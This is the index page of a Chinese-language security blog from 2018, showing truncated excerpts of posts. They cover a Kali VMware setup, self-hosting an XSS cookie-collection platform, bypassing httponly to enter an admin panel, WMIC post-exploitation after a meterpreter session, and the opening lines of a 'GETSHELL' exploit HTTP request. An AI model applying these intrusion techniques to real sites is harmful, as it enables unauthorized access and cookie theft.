jasonx's Blog

jasonx 2018/10/07 3557 0

0x00 首要任务kali_linux_2018.1 安装 Vmware-Tools 创建与 windows 的共享文件夹0x01 设置方法右键虚拟机设置，添加共享文件夹。查看共享目录命令vmware-hgfsclient 新建文件夹mkdir /root/共享/ 挂载共享文件夹/usr/bin/vmhgfs-fuse .host:/ /root/共享 -o subtype=vmhgfs-fuse,allow_other 0x02...

jasonx 2018/10/04 2976 0

前言在很多时候，为了测试xss漏洞，我们需要一个xss平台，如果自己搭建就更安全便捷了，今天我们来介绍下如何自建xss平台。0x00 准备工作首先你需要一个服务器，和运行环境，这个就不用多说了。0x01 开始搭建下载压缩包以后，上传到网站，解压。然后打开config.php文件，修改数据库配置信息，域名信息等等。这里修改成true,开启url重写。$config['urlrewrite'] =true; 修改18行为...

jasonx 2018/09/30 1203 0

前言在互联网高速发展的今天，很多针对网络诈骗的骗术也在日益更新，虽然都在宣传如何防诈骗，但是不断更新的骗术，始终让人防不胜防。今天我们揭秘的这个骗子充分利用家长对儿女的关爱，然后冒充子女的对这些家长进行诈骗，过程让人看了揪心、愤怒。详情请外下看。0x00 关于控制权关于如何拿下骗子的控制权，非法控制骗子是否违法这里咱们暂不讨论。我的目的很简单，曝光骗子及骗术，让广大网友避免上当受骗曝光骗子的骗术，以及所有涉及到的QQ群（包括骗子暂...

jasonx 2018/09/26 2461 0

免责声明：本博客建立的初衷在于分享网络安全技术，IT技术等等，便于技术人员学习和研究，请遵守本地法律，任何非法用途产生的后果自负，与本博客无关。1.本博客的网络安全技术，仅供网络运维、信息安全等技术人员学习和研究，禁止使用本博客的技术文章、源码、工具等用于非法用途，否则后果自负。2.本博客渗透资源不保证资源的准确性、安全性和完整性；下载后请自行检查是否带有病毒，本博客也不承担网友因使用这些资源对自己和他人造成任何形式的损失或伤害，...

jasonx 2018/09/21 2456 18

前言渗透过程中，有时候遇某些网站，明明检测到有xss漏洞，但是盲打以后，收到的cookie还是不能登录后台，大多数的原因都是因为对方的cookie关键参数开启了httponly，导致你获取到的cookie参数不全，所以没法登录。今天和大家分享一次绕过httponly拿后台的思路。0x01 遇到一个存在xss的站点这个站点在提交订单的时候，下面有个订单备注输入框存在存储型xss。我们直接插入插入xss代码； </text...

jasonx 2018/09/15 1899 0

写在前面的话在这篇文章中，我们将讨论如何在攻击的后渗透利用阶段使用WMIC（Windows Management InstrumentationCommand Line）。当攻击者在远程PC上拿到meterpreter会话之后，他们就可以枚举大量的系统信息，并利用WMI命令行工具来进行更深程度的操作。首先，我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后，我们还会告诉大家如何提权至管理员权限。WMIC命令行可以...

jasonx 2018/09/06 2797 0

GETSHELL exp:GET /user.php?act=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0...